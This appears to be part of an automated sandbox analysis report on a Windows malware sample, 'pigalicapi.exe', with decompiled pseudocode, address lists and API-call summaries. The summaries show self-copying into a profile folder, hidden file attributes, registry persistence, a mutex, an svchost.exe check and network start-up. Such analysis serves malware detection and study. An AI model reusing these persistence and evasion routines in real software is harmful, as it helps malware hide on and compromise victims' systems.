                                                                                                                                                                                                                                                                                                        						_t104 = E04004020(_v12092, _v12080,  &_v1148, 1, 5, 0);
                                                                                                                                                                                                                                                                                                        						_t177 = _t177 + 0x18;
                                                                                                                                                                                                                                                                                                        						if((_t104 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                                        							_v12101 = 1;
                                                                                                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                                                                                                        							_t106 = E04004020(_v9560, _v12072,  &_v1148, 3, 0xa, 1); // executed
                                                                                                                                                                                                                                                                                                        							_t177 = _t177 + 0x18;
                                                                                                                                                                                                                                                                                                        							if((_t106 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                                        								_v12101 = 1;
                                                                                                                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                                                                                                                        								_v12116 = 0;
                                                                                                                                                                                                                                                                                                        								_v12112 = E040042E0( &_v12116);
                                                                                                                                                                                                                                                                                                        								_t110 = E04004020(_v12116, _v12112,  &_v1148, 1, 0x17, 0);
                                                                                                                                                                                                                                                                                                        								_t177 = _t177 + 0x1c;
                                                                                                                                                                                                                                                                                                        								if((_t110 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                                        									_v12101 = 1;
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        								if(_v12116 != 0) {
                                                                                                                                                                                                                                                                                                        									VirtualFree(_v12116, 0, 0x8000);
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					if((_v12101 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                                        						if( *0x40118a4 != 1) {
                                                                                                                                                                                                                                                                                                        							if( *0x40118a4 == 2) {
                                                                                                                                                                                                                                                                                                        								 *0x40118a4 = 1;
                                                                                                                                                                                                                                                                                                        								_v12108 = 0x1499700;
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                                                                                                        							if( *0x40130e4 != 2) {
                                                                                                                                                                                                                                                                                                        								_v12108 = 0x1499700;
                                                                                                                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                                                                                                                        								_v12108 = 0x3e8;
                                                                                                                                                                                                                                                                                                        								 *0x40118a4 = 2;
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					Sleep(_v12108); // executed
                                                                                                                                                                                                                                                                                                        					goto L17;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        			}





















































                                                                                                                                                                                                                                                                                                        0x04003b08
                                                                                                                                                                                                                                                                                                        0x04003b12
                                                                                                                                                                                                                                                                                                        0x04003b19
                                                                                                                                                                                                                                                                                                        0x04003b2d
                                                                                                                                                                                                                                                                                                        0x04003b38
                                                                                                                                                                                                                                                                                                        0x04003b40
                                                                                                                                                                                                                                                                                                        0x04003b4f
                                                                                                                                                                                                                                                                                                        0x04003b54
                                                                                                                                                                                                                                                                                                        0x04003b5c
                                                                                                                                                                                                                                                                                                        0x0400400a
                                                                                                                                                                                                                                                                                                        0x0400400c
                                                                                                                                                                                                                                                                                                        0x0400400c
                                                                                                                                                                                                                                                                                                        0x04003b70
                                                                                                                                                                                                                                                                                                        0x04003b7f
                                                                                                                                                                                                                                                                                                        0x04003b8c
                                                                                                                                                                                                                                                                                                        0x04003b9a
                                                                                                                                                                                                                                                                                                        0x04003ba2
                                                                                                                                                                                                                                                                                                        0x04003bb4
                                                                                                                                                                                                                                                                                                        0x04003bca
                                                                                                                                                                                                                                                                                                        0x04003bd2
                                                                                                                                                                                                                                                                                                        0x04003bd7
                                                                                                                                                                                                                                                                                                        0x04003be1
                                                                                                                                                                                                                                                                                                        0x04003be6
                                                                                                                                                                                                                                                                                                        0x04003beb
                                                                                                                                                                                                                                                                                                        0x04003bfa
                                                                                                                                                                                                                                                                                                        0x04003c02
                                                                                                                                                                                                                                                                                                        0x04003c06
                                                                                                                                                                                                                                                                                                        0x04003c2a
                                                                                                                                                                                                                                                                                                        0x04003c34
                                                                                                                                                                                                                                                                                                        0x04003c3c
                                                                                                                                                                                                                                                                                                        0x04003c41
                                                                                                                                                                                                                                                                                                        0x04003c48
                                                                                                                                                                                                                                                                                                        0x04003c4d
                                                                                                                                                                                                                                                                                                        0x04003c53
                                                                                                                                                                                                                                                                                                        0x04003c64
                                                                                                                                                                                                                                                                                                        0x04003c6c
                                                                                                                                                                                                                                                                                                        0x04003c71
                                                                                                                                                                                                                                                                                                        0x04003c74
                                                                                                                                                                                                                                                                                                        0x04003c79
                                                                                                                                                                                                                                                                                                        0x04003c7f
                                                                                                                                                                                                                                                                                                        0x04003c80
                                                                                                                                                                                                                                                                                                        0x04003c85
                                                                                                                                                                                                                                                                                                        0x04003c8c
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x04003c92
                                                                                                                                                                                                                                                                                                        0x04003c92
                                                                                                                                                                                                                                                                                                        0x04003c98
                                                                                                                                                                                                                                                                                                        0x04003c9e
                                                                                                                                                                                                                                                                                                        0x04003cb1
                                                                                                                                                                                                                                                                                                        0x04003cb3
                                                                                                                                                                                                                                                                                                        0x04003cbb
                                                                                                                                                                                                                                                                                                        0x04003cbb
                                                                                                                                                                                                                                                                                                        0x04003cc9
                                                                                                                                                                                                                                                                                                        0x04003ccb
                                                                                                                                                                                                                                                                                                        0x04003cd4
                                                                                                                                                                                                                                                                                                        0x04003cd4
                                                                                                                                                                                                                                                                                                        0x04003ce3
                                                                                                                                                                                                                                                                                                        0x04003ce5
                                                                                                                                                                                                                                                                                                        0x04003cee
                                                                                                                                                                                                                                                                                                        0x04003cee
                                                                                                                                                                                                                                                                                                        0x04003cfd
                                                                                                                                                                                                                                                                                                        0x04003cff
                                                                                                                                                                                                                                                                                                        0x04003d07
                                                                                                                                                                                                                                                                                                        0x04003d07
                                                                                                                                                                                                                                                                                                        0x04003d15
                                                                                                                                                                                                                                                                                                        0x04003d17
                                                                                                                                                                                                                                                                                                        0x04003d20
                                                                                                                                                                                                                                                                                                        0x04003d20
                                                                                                                                                                                                                                                                                                        0x04003d26
                                                                                                                                                                                                                                                                                                        0x04003d2f
                                                                                                                                                                                                                                                                                                        0x04003d31
                                                                                                                                                                                                                                                                                                        0x04003d3a
                                                                                                                                                                                                                                                                                                        0x04003d3a
                                                                                                                                                                                                                                                                                                        0x04003d40
                                                                                                                                                                                                                                                                                                        0x04003d58
                                                                                                                                                                                                                                                                                                        0x04003d60
                                                                                                                                                                                                                                                                                                        0x04003d80
                                                                                                                                                                                                                                                                                                        0x04003d88
                                                                                                                                                                                                                                                                                                        0x04003da7
                                                                                                                                                                                                                                                                                                        0x04003daf
                                                                                                                                                                                                                                                                                                        0x04003db5
                                                                                                                                                                                                                                                                                                        0x04003dbf
                                                                                                                                                                                                                                                                                                        0x04003dc9
                                                                                                                                                                                                                                                                                                        0x04003df3
                                                                                                                                                                                                                                                                                                        0x04003df8
                                                                                                                                                                                                                                                                                                        0x04003dfd
                                                                                                                                                                                                                                                                                                        0x04003e0d
                                                                                                                                                                                                                                                                                                        0x04003e2b
                                                                                                                                                                                                                                                                                                        0x04003e30
                                                                                                                                                                                                                                                                                                        0x04003e39
                                                                                                                                                                                                                                                                                                        0x04003e3f
                                                                                                                                                                                                                                                                                                        0x04003e3f
                                                                                                                                                                                                                                                                                                        0x04003e49
                                                                                                                                                                                                                                                                                                        0x04003e53
                                                                                                                                                                                                                                                                                                        0x04003e53
                                                                                                                                                                                                                                                                                                        0x04003e5a
                                                                                                                                                                                                                                                                                                        0x04003e64
                                                                                                                                                                                                                                                                                                        0x04003e75
                                                                                                                                                                                                                                                                                                        0x04003e7d
                                                                                                                                                                                                                                                                                                        0x04003e9e
                                                                                                                                                                                                                                                                                                        0x04003ea3
                                                                                                                                                                                                                                                                                                        0x04003eab
                                                                                                                                                                                                                                                                                                        0x04003f8a
                                                                                                                                                                                                                                                                                                        0x04003eb1
                                                                                                                                                                                                                                                                                                        0x04003ecc
                                                                                                                                                                                                                                                                                                        0x04003ed1
                                                                                                                                                                                                                                                                                                        0x04003ed9
                                                                                                                                                                                                                                                                                                        0x04003f81
                                                                                                                                                                                                                                                                                                        0x04003edf
                                                                                                                                                                                                                                                                                                        0x04003efa
                                                                                                                                                                                                                                                                                                        0x04003eff
                                                                                                                                                                                                                                                                                                        0x04003f07
                                                                                                                                                                                                                                                                                                        0x04003f78
                                                                                                                                                                                                                                                                                                        0x04003f09
                                                                                                                                                                                                                                                                                                        0x04003f09
                                                                                                                                                                                                                                                                                                        0x04003f22
                                                                                                                                                                                                                                                                                                        0x04003f43
                                                                                                                                                                                                                                                                                                        0x04003f48
                                                                                                                                                                                                                                                                                                        0x04003f50
                                                                                                                                                                                                                                                                                                        0x04003f52
                                                                                                                                                                                                                                                                                                        0x04003f52
                                                                                                                                                                                                                                                                                                        0x04003f60
                                                                                                                                                                                                                                                                                                        0x04003f70
                                                                                                                                                                                                                                                                                                        0x04003f70
                                                                                                                                                                                                                                                                                                        0x04003f76
                                                                                                                                                                                                                                                                                                        0x04003f7f
                                                                                                                                                                                                                                                                                                        0x04003f88
                                                                                                                                                                                                                                                                                                        0x04003f9a
                                                                                                                                                                                                                                                                                                        0x04003fa3
                                                                                                                                                                                                                                                                                                        0x04003fd7
                                                                                                                                                                                                                                                                                                        0x04003fd9
                                                                                                                                                                                                                                                                                                        0x04003fe3
                                                                                                                                                                                                                                                                                                        0x04003fe3
                                                                                                                                                                                                                                                                                                        0x04003fa5
                                                                                                                                                                                                                                                                                                        0x04003fac
                                                                                                                                                                                                                                                                                                        0x04003fc4
                                                                                                                                                                                                                                                                                                        0x04003fae
                                                                                                                                                                                                                                                                                                        0x04003fae
                                                                                                                                                                                                                                                                                                        0x04003fb8
                                                                                                                                                                                                                                                                                                        0x04003fb8
                                                                                                                                                                                                                                                                                                        0x04003fce
                                                                                                                                                                                                                                                                                                        0x04003fa3
                                                                                                                                                                                                                                                                                                        0x04003ff4
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x04003ff4

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\pigalicapi.exe,00000208), ref: 04003B2D
                                                                                                                                                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(04005DB0), ref: 04003B38
                                                                                                                                                                                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 04003B40
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04004510: GetModuleFileNameA.KERNEL32(00000000,?,00000208), ref: 0400456C
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04004510: CreateFileA.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0400458B
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04004510: GetFileSize.KERNEL32(000000FF,00000000), ref: 040045AD
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04004510: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 040045D6
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04004510: ReadFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 04004617
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04004510: FindCloseChangeNotification.KERNEL32(000000FF), ref: 0400463E
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04004510: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 040047C0
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04004510: CloseHandle.KERNEL32(00000000), ref: 040047E0
                                                                                                                                                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 0400400C
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04005700: GetModuleFileNameA.KERNEL32(00000000,-00000100,00000104), ref: 04005742
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04005700: lstrcpyA.KERNEL32(-0000043B,pigalicapi), ref: 040057B8
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04005700: GetAllUsersProfileDirectoryA.USERENV(?,00000207), ref: 040057F1
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04005700: wnsprintfA.SHLWAPI ref: 0400582F
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04005700: CreateFileA.KERNEL32(-00000100,80000000,00000007,00000000,00000003,00000080,00000000), ref: 04005854
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04005700: GetFileSize.KERNEL32(000000FF,00000000), ref: 0400586D
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04005A00: lstrcpyA.KERNEL32(Mzsrkvcweomac,WDefault), ref: 04005A47
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04005A00: lstrlenA.KERNEL32(0400C4E0), ref: 04005A7D
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04005A00: lstrcpyA.KERNEL32(00000000,0400C4E0), ref: 04005A97
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04005A00: lstrlenA.KERNEL32(00000000), ref: 04005AA1
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04005A00: lstrlenA.KERNEL32(Mzsrkvcweomac), ref: 04005AAE
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04005A00: lstrcatA.KERNEL32(00000000,Mzsrkvcweomac), ref: 04005AC8
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04005A00: RegCreateKeyExA.KERNEL32(80000001,00000000,00000000,00000000,00000000,00020006,00000000,00000000,00000000), ref: 04005B00
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04005A00: RegCloseKey.KERNEL32(00000000), ref: 04005B0E
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04005A00: lstrlenA.KERNEL32(00000000), ref: 04005B3B
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04009400: lstrcpyA.KERNEL32(?,00000000), ref: 04009513
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04009400: CharUpperA.USER32(?), ref: 04009521
                                                                                                                                                                                                                                                                                                          • Part of subcall function 040099F0: GetCurrentProcess.KERNEL32(00000008,?), ref: 04009A0A
                                                                                                                                                                                                                                                                                                          • Part of subcall function 040099F0: OpenProcessToken.ADVAPI32(00000000), ref: 04009A11
                                                                                                                                                                                                                                                                                                          • Part of subcall function 040099F0: GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 04009A3A
                                                                                                                                                                                                                                                                                                          • Part of subcall function 040099F0: GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),?,00000400,00000400), ref: 04009A77
                                                                                                                                                                                                                                                                                                          • Part of subcall function 040099F0: CreateWellKnownSid.ADVAPI32(0000000C,00000000,?,00000044), ref: 04009AAD
                                                                                                                                                                                                                                                                                                          • Part of subcall function 040099F0: EqualSid.ADVAPI32(?,00000000), ref: 04009AC3
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04006060: GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 04006082
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04005E00: CreateMutexA.KERNEL32(00000000,00000000,pigalicapi,?,04003BEB), ref: 04005E0C
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04005E00: GetLastError.KERNEL32(?,04003BEB), ref: 04005E12
                                                                                                                                                                                                                                                                                                        • StrStrIA.SHLWAPI(C:\Users\user\pigalicapi.exe,svchost.exe), ref: 04003BFA
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04001120: lstrlenA.KERNEL32(00000000), ref: 04001148
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04001120: lstrlenA.KERNEL32(00000000), ref: 0400115A
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04001120: GetAllUsersProfileDirectoryA.USERENV(?,00000104), ref: 04001182
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04001120: wnsprintfA.SHLWAPI ref: 040011BD
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04001120: lstrcmpiA.KERNEL32(00000104,?), ref: 040011D1
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04001120: CopyFileA.KERNEL32(00000104,?,00000000), ref: 040011F0
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04001120: SetFileAttributesA.KERNEL32(?,00000006), ref: 040011FF
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04001120: lstrcpyA.KERNEL32(00000104,?), ref: 04001210
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04001120: lstrcpyA.KERNEL32(00000000,?), ref: 04001249
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04001120: lstrcpyA.KERNEL32(-00000208,00000000), ref: 0400125D
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04001120: CreateThread.KERNEL32 ref: 04001274
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04005E30: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,000F003F,00000000), ref: 04005E7E
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04005E30: RegQueryValueExA.KERNEL32(00000000,?,00000000,00000000,?,00000020), ref: 04005EB2
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04005E30: RegDeleteValueA.ADVAPI32(00000000,?), ref: 04005ED6
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04005E30: RegSetValueExA.KERNEL32(00000000,?,00000000,00000003,?,00000010), ref: 04005F0B
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04005E30: RegCloseKey.KERNEL32(00000000), ref: 04005F19
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04006CF0: RegOpenKeyExA.KERNEL32(80000001,04013B88,00000000,000F003F,00000000), ref: 04006D30
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04006CF0: RegQueryValueExA.KERNEL32(00000000,04013FA6,00000000,00000003,?,00000020), ref: 04006D61
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04006CF0: RegDeleteValueA.ADVAPI32(00000000,04013FA6), ref: 04006D7E
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04006CF0: RegCloseKey.ADVAPI32(00000000), ref: 04006D88
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04005F30: lstrcpyA.KERNEL32(?,pigalicapi), ref: 04005F67
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04005F30: lstrcatA.KERNEL32(?,04013FE2), ref: 04005F7A
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04005F30: RegOpenKeyExA.ADVAPI32(80000001,04003C58,00000000,000F003F,00000000), ref: 04005FB3
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04005F30: RegQueryValueExA.KERNEL32(00000000,?,00000000,00000000,?,00000020), ref: 04005FF2
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04005F30: RegSetValueExA.KERNEL32(00000000,?,00000000,00000003,?,00000010), ref: 0400603B
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04005F30: RegCloseKey.KERNEL32(00000000), ref: 04006045
                                                                                                                                                                                                                                                                                                        • WSAStartup.WS2_32(00000202,?), ref: 04003C85
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04004020: InitializeCriticalSection.KERNEL32(?), ref: 04004066
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04004020: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0400407A
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04004020: EnterCriticalSection.KERNEL32(?,?), ref: 040040AF
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04004020: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 040040C6
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04004020: TerminateThread.KERNEL32(00000000,00000000), ref: 040040E6
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04004020: ResetEvent.KERNEL32(00000000), ref: 040040F7
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04004020: LeaveCriticalSection.KERNEL32(?), ref: 04004101
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04004020: CreateThread.KERNEL32 ref: 04004118
                                                                                                                                                                                                                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 04003F70
                                                                                                                                                                                                                                                                                                        • Sleep.KERNEL32(?), ref: 04003FF4
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: File$Createlstrcpy$Value$Closelstrlen$ModuleNameOpenVirtual$CriticalFreeProcessQuerySectionThreadToken$DeleteDirectoryEventInformationInitializeProfileSizeUserslstrcatwnsprintf$AllocAttributesChangeCharCopyCurrentEnterEqualErrorExceptionExitFilterFindHandleKnownLastLeaveMutexNotificationReadResetSleepStartupTerminateUnhandledUpperWelllstrcmpi
                                                                                                                                                                                                                                                                                                        • String ID: C:\Users\user\pigalicapi.exe$Hogerfazwafx$R+g$pigalicapi$svchost.exe
                                                                                                                                                                                                                                                                                                        • API String ID: 1389186475-402523118
                                                                                                                                                                                                                                                                                                        • Opcode ID: 936e491051d98ae6235cf02158d581c5c2971d700090c455091cf7b57a494376
                                                                                                                                                                                                                                                                                                        • Instruction ID: 63648f9aec36bb26e753af5ac432a688f143a616cbd4529da37374c18a699aed
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 936e491051d98ae6235cf02158d581c5c2971d700090c455091cf7b57a494376
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7EC11AB0944364AAF725DF64AC19BFA77B0AB04709F0480FDE6487A1E1DB7C6A84CF51
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 44%
                                                                                                                                                                                                                                                                                                        			E00401179() {
                                                                                                                                                                                                                                                                                                        				void* _v16;
                                                                                                                                                                                                                                                                                                        				signed int _v48;
                                                                                                                                                                                                                                                                                                        				void* _v52;
                                                                                                                                                                                                                                                                                                        				char _v96;
                                                                                                                                                                                                                                                                                                        				void* _v112;
                                                                                                                                                                                                                                                                                                        				void* _v113;
                                                                                                                                                                                                                                                                                                        				signed int _v116;
                                                                                                                                                                                                                                                                                                        				void* _v120;
                                                                                                                                                                                                                                                                                                        				long _v132;
                                                                                                                                                                                                                                                                                                        				void* _v136;
                                                                                                                                                                                                                                                                                                        				long _v140;
                                                                                                                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                                                                                                                        				void* __ebp;
                                                                                                                                                                                                                                                                                                        				void* _t48;
                                                                                                                                                                                                                                                                                                        				signed int _t50;
                                                                                                                                                                                                                                                                                                        				signed int _t51;
                                                                                                                                                                                                                                                                                                        				long _t53;
                                                                                                                                                                                                                                                                                                        				signed int _t54;
                                                                                                                                                                                                                                                                                                        				signed int _t55;
                                                                                                                                                                                                                                                                                                        				signed int _t56;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t57;
                                                                                                                                                                                                                                                                                                        				_Unknown_base(*)()* _t59;
                                                                                                                                                                                                                                                                                                        				signed char* _t63;
                                                                                                                                                                                                                                                                                                        				signed int _t64;
                                                                                                                                                                                                                                                                                                        				void* _t65;
                                                                                                                                                                                                                                                                                                        				void* _t66;
                                                                                                                                                                                                                                                                                                        				void* _t67;
                                                                                                                                                                                                                                                                                                        				void* _t70;
                                                                                                                                                                                                                                                                                                        				long _t71;
                                                                                                                                                                                                                                                                                                        				signed int _t72;
                                                                                                                                                                                                                                                                                                        				void* _t73;
                                                                                                                                                                                                                                                                                                        				void* _t77;
                                                                                                                                                                                                                                                                                                        				signed int _t84;
                                                                                                                                                                                                                                                                                                        				signed int _t85;
                                                                                                                                                                                                                                                                                                        				long _t87;
                                                                                                                                                                                                                                                                                                        				signed int _t88;
                                                                                                                                                                                                                                                                                                        				signed int _t90;
                                                                                                                                                                                                                                                                                                        				void* _t95;
                                                                                                                                                                                                                                                                                                        				signed int _t96;
                                                                                                                                                                                                                                                                                                        				struct _STARTUPINFOA* _t97;
                                                                                                                                                                                                                                                                                                        				void* _t98;
                                                                                                                                                                                                                                                                                                        				signed int _t100;
                                                                                                                                                                                                                                                                                                        				signed int _t101;
                                                                                                                                                                                                                                                                                                        				void* _t102;
                                                                                                                                                                                                                                                                                                        				void* _t105;
                                                                                                                                                                                                                                                                                                        				signed int _t106;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t108;
                                                                                                                                                                                                                                                                                                        				void* _t109;
                                                                                                                                                                                                                                                                                                        				long _t111;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t112;
                                                                                                                                                                                                                                                                                                        				void* _t114;
                                                                                                                                                                                                                                                                                                        				void* _t115;
                                                                                                                                                                                                                                                                                                        				void* _t117;
                                                                                                                                                                                                                                                                                                        				signed int _t121;
                                                                                                                                                                                                                                                                                                        				void* _t122;
                                                                                                                                                                                                                                                                                                        				void** _t123;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				while(1) {
                                                                                                                                                                                                                                                                                                        					L1:
                                                                                                                                                                                                                                                                                                        					_push(_t115);
                                                                                                                                                                                                                                                                                                        					_t115 = _t117;
                                                                                                                                                                                                                                                                                                        					_push(_t102);
                                                                                                                                                                                                                                                                                                        					_push(_t108);
                                                                                                                                                                                                                                                                                                        					_t97 =  &_v96;
                                                                                                                                                                                                                                                                                                        					memset(_t97, 0, 0x11 << 2);
                                                                                                                                                                                                                                                                                                        					_t48 = E0040DB20(0x30, _t86);
                                                                                                                                                                                                                                                                                                        					_t50 =  &_v113 & 0xfffffff0;
                                                                                                                                                                                                                                                                                                        					 *_t50 = 0xcccccccc;
                                                                                                                                                                                                                                                                                                        					 *((intOrPtr*)(_t50 + 4)) = 0xcccccccc;
                                                                                                                                                                                                                                                                                                        					 *((intOrPtr*)(_t50 + 8)) = 0xcccccccc;
                                                                                                                                                                                                                                                                                                        					 *((intOrPtr*)(_t50 + 0xc)) = 0xcccccccc;
                                                                                                                                                                                                                                                                                                        					 *((intOrPtr*)(_t50 + 0x10)) = 0xcccccccc;
                                                                                                                                                                                                                                                                                                        					 *((intOrPtr*)(_t50 + 0x14)) = 0xcccccccc;
                                                                                                                                                                                                                                                                                                        					 *((intOrPtr*)(_t50 + 0x18)) = 0xcccccccc;
                                                                                                                                                                                                                                                                                                        					 *((intOrPtr*)(_t50 + 0x1c)) = 0xcccccccc;
                                                                                                                                                                                                                                                                                                        					_t121 = _t117 - 0x0000007c + 0xc - _t48 & 0xfffffff0;
                                                                                                                                                                                                                                                                                                        					_t51 =  *0x422054; // 0x1
                                                                                                                                                                                                                                                                                                        					if(_t51 != 0) {
                                                                                                                                                                                                                                                                                                        						GetStartupInfoA(_t97);
                                                                                                                                                                                                                                                                                                        						_t121 = _t121 - 4;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					_t109 = InterlockedCompareExchange;
                                                                                                                                                                                                                                                                                                        					_t87 =  *( *[fs:0x18] + 4);
                                                                                                                                                                                                                                                                                                        					_t105 = Sleep;
                                                                                                                                                                                                                                                                                                        					while(1) {
                                                                                                                                                                                                                                                                                                        						_t53 = InterlockedCompareExchange(0x422480, _t87, 0);
                                                                                                                                                                                                                                                                                                        						_t122 = _t121 - 0xc;
                                                                                                                                                                                                                                                                                                        						if(_t53 == 0) {
                                                                                                                                                                                                                                                                                                        							break;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						if(_t53 == _t87) {
                                                                                                                                                                                                                                                                                                        							_t54 =  *0x422484; // 0x2
                                                                                                                                                                                                                                                                                                        							_t86 = 1;
                                                                                                                                                                                                                                                                                                        							if(_t54 != 1) {
                                                                                                                                                                                                                                                                                                        								L7:
                                                                                                                                                                                                                                                                                                        								_t55 =  *0x422484; // 0x2
                                                                                                                                                                                                                                                                                                        								if(_t55 == 0) {
                                                                                                                                                                                                                                                                                                        									 *0x422484 = 1;
                                                                                                                                                                                                                                                                                                        									_v136 = 0x42c018;
                                                                                                                                                                                                                                                                                                        									_v140 = 0x42c00c;
                                                                                                                                                                                                                                                                                                        									L0040EE78();
                                                                                                                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                                                                                                                        									 *0x422004 = 1;
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        								_t56 =  *0x422484; // 0x2
                                                                                                                                                                                                                                                                                                        								if(_t56 == 1) {
                                                                                                                                                                                                                                                                                                        									goto L36;
                                                                                                                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                                                                                                                        									goto L10;
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                                                                                                                        								L35:
